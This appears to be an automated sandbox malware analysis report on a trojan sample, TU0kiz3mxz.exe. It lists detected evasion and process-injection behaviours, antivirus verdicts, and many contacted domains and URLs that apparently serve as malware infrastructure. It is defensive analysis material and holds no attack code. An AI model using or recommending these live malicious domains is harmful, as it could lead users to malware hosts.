          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587624 Sample: TU0kiz3mxz.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 37 www.cleans.xyz 2->37 39 www.yeloma-treatment-82106.bond 2->39 41 10 other IPs or domains 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 61 9 other signatures 2->61 11 TU0kiz3mxz.exe 3 2->11         started        15 explorer.exe 141 2->15         started        signatures3 59 Performs DNS queries to domains with low reputation 37->59 process4 file5 35 C:\Users\user\AppData\...\TU0kiz3mxz.exe.log, ASCII 11->35 dropped 73 Tries to detect virtualization through RDTSC time measurements 11->73 75 Switches to a custom stack to bypass stack traces 11->75 17 TU0kiz3mxz.exe 11->17         started        20 TU0kiz3mxz.exe 11->20         started        77 Query firmware table information (likely to detect VMs) 15->77 signatures6 process7 signatures8 45 Modifies the context of a thread in another process (thread injection) 17->45 47 Maps a DLL or memory area into another process 17->47 49 Sample uses process hollowing technique 17->49 51 2 other signatures 17->51 22 explorer.exe 26 1 17->22 injected process9 dnsIp10 43 www.cleans.xyz 13.248.169.48, 49868, 80 AMAZON-02US United States 22->43 63 System process connects to network (likely due to code injection or exploit) 22->63 26 explorer.exe 22->26         started        29 WerFault.exe 21 22->29         started        signatures11 process12 signatures13 65 Modifies the context of a thread in another process (thread injection) 26->65 67 Maps a DLL or memory area into another process 26->67 69 Tries to detect virtualization through RDTSC time measurements 26->69 71 Switches to a custom stack to bypass stack traces 26->71 31 cmd.exe 1 26->31         started        process14 process15 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TU0kiz3mxz.exe77%VirustotalBrowse
          TU0kiz3mxz.exe91%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
          TU0kiz3mxz.exe100%AviraTR/AD.Swotter.ooigd
          TU0kiz3mxz.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.ierra777.vipReferer:0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone/m25s/www.6874.club0%Avira URL Cloudsafe
          http://www.pringhillinfos.net/m25s/0%Avira URL Cloudsafe
          http://www.ierra777.vip0%Avira URL Cloudsafe
          http://www.cleans.xyz0%Avira URL Cloudsafe
          http://www.wistlnc.net0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone0%Avira URL Cloudsafe
          http://www.uy-smart-tv-nl.todayReferer:0%Avira URL Cloudsafe
          http://www.cskuvq.shop0%Avira URL Cloudsafe
          http://www.araghospitality.net0%Avira URL Cloudsafe
          www.ehills.shop/m25s/0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zoneReferer:0%Avira URL Cloudsafe
          http://www.raphic-design-degree-33148.bondReferer:0%Avira URL Cloudsafe
          http://www.araghospitality.net/m25s/www.ehills.shop0%Avira URL Cloudsafe
          http://www.xewaov.xyz/m25s/www.oches-a-credito-es.bond0%Avira URL Cloudsafe
          http://www.ehills.shop/m25s/0%Avira URL Cloudsafe
          http://www.76iw543gw.autos0%Avira URL Cloudsafe
          http://www.6uzh.digitalReferer:0%Avira URL Cloudsafe
          http://www.itodemo.click/m25s/www.xewaov.xyz0%Avira URL Cloudsafe
          http://www.pslag-hal-2.onlineReferer:0%Avira URL Cloudsafe
          http://www.ax-th-6011838.fyiReferer:0%Avira URL Cloudsafe
          http://www.uykoii.shopReferer:0%Avira URL Cloudsafe
          http://www.oches-a-credito-es.bond/m25s/www.yeloma-treatment-82106.bond0%Avira URL Cloudsafe
          http://www.yeloma-treatment-82106.bondReferer:0%Avira URL Cloudsafe
          http://www.dt5r.shop/m25s/0%Avira URL Cloudsafe
          http://www.cctofi.cpaReferer:0%Avira URL Cloudsafe
          http://www.anforexuytin.cfd/m25s/0%Avira URL Cloudsafe
          http://www.cskuvq.shopReferer:0%Avira URL Cloudsafe
          http://www.ildcraft.xyz/m25s/0%Avira URL Cloudsafe
          http://www.uykoii.shop0%Avira URL Cloudsafe
          http://www.cleans.xyzReferer:0%Avira URL Cloudsafe
          http://www.ental-health-69511.bondReferer:0%Avira URL Cloudsafe
          http://www.pringhillinfos.netReferer:0%Avira URL Cloudsafe
          http://www.6874.clubReferer:0%Avira URL Cloudsafe
          http://www.xewaov.xyz/m25s/0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone/m25s/0%Avira URL Cloudsafe
          http://www.ax-th-6011838.fyi/m25s/0%Avira URL Cloudsafe
          http://www.cskuvq.shop/m25s/o0%Avira URL Cloudsafe
          http://www.attoomasteracademy.online0%Avira URL Cloudsafe
          http://www.uykoii.shop/m25s/0%Avira URL Cloudsafe
          http://www.anforexuytin.cfd0%Avira URL Cloudsafe
          http://www.araghospitality.netReferer:0%Avira URL Cloudsafe
          http://www.xewaov.xyzReferer:0%Avira URL Cloudsafe
          http://www.cskuvq.shop/m25s/0%Avira URL Cloudsafe
          http://www.olnacasinotcs14.top0%Avira URL Cloudsafe
          http://www.cleans.xyz/m25s/100%Avira URL Cloudmalware
          http://www.dt5r.shop/m25s/www.cctofi.cpa0%Avira URL Cloudsafe
          http://www.armanshop.xyzReferer:0%Avira URL Cloudsafe
          http://www.cskuvq.shop/m25s/www.olnacasinotcs14.top0%Avira URL Cloudsafe
          http://www.armanshop.xyz0%Avira URL Cloudsafe
          http://www.ierra777.vip/m25s/www.cskuvq.shop0%Avira URL Cloudsafe
          http://www.pringhillinfos.net0%Avira URL Cloudsafe
          http://www.attoomasteracademy.online/m25s/www.raphic-design-degree-33148.bond0%Avira URL Cloudsafe
          http://www.6uzh.digital/m25s/0%Avira URL Cloudsafe
          http://www.ildcraft.xyzReferer:0%Avira URL Cloudsafe
          http://www.wistlnc.net/m25s/0%Avira URL Cloudsafe
          http://www.anforexuytin.cfd/m25s/www.ildcraft.xyz0%Avira URL Cloudsafe
          http://www.wistlnc.net/m25s/www.armanshop.xyz0%Avira URL Cloudsafe
          https://outlook.com2025-01-10T10%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.cleans.xyz
          		13.248.169.48
          		truetrue
            		unknown
            www.olnacasinotcs14.top
            		unknown
            		unknowntrue
              		unknown
              www.raphic-design-degree-33148.bond
              		unknown
              		unknowntrue
                		unknown
                www.yeloma-treatment-82106.bond
                		unknown
                		unknowntrue
                  		unknown
                  www.6874.club
                  		unknown
                  		unknowntrue
                    		unknown
                    www.oches-a-credito-es.bond
                    		unknown
                    		unknowntrue
                      		unknown
                      www.cskuvq.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        www.araghospitality.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ehills.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.attoomasteracademy.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.orean-course-289113002.zone
                              		unknown
                              		unknowntrue
                                		unknown
                                api.msn.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.ehills.shop/m25s/true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.pringhillinfos.net/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/Vh5j3k6explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4159088871.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2664758561.0000000004EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.cleans.xyzexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.ierra777.vipexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cskuvq.shopexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.wistlnc.netexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designersTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.uy-smart-tv-nl.todayReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.ierra777.vipReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.orean-course-289113002.zoneexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.araghospitality.netexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.orean-course-289113002.zone/m25s/www.6874.clubexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.76iw543gw.autosexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.ehills.shop/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.raphic-design-degree-33148.bondReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.orean-course-289113002.zoneReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://wns.windows.com/Lexplorer.exe, 00000004.00000000.1716978522.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.xewaov.xyz/m25s/www.oches-a-credito-es.bondexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.araghospitality.net/m25s/www.ehills.shopexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.6uzh.digitalReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.itodemo.click/m25s/www.xewaov.xyzexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.pslag-hal-2.onlineReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.ax-th-6011838.fyiReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.carterandcone.comlTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.msn.com:443/v1/news/Feed/Windows?Kexplorer.exe, 0000000F.00000003.3928998336.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.0000000009569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.yeloma-treatment-82106.bondReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://outlook.com_explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.dt5r.shop/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.oches-a-credito-es.bond/m25s/www.yeloma-treatment-82106.bondexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.founder.com.cn/cn/bTheTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.anforexuytin.cfd/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.cctofi.cpaReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.uykoii.shopReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.cskuvq.shopReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.uykoii.shopexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.microexplorer.exe, 00000004.00000002.2632617242.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2634903958.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2632406238.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.ildcraft.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.cleans.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.pringhillinfos.netReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.typography.netDTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.ental-health-69511.bondReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.orean-course-289113002.zone/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.fonts.comTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sandoll.co.krTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.xewaov.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.6874.clubReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
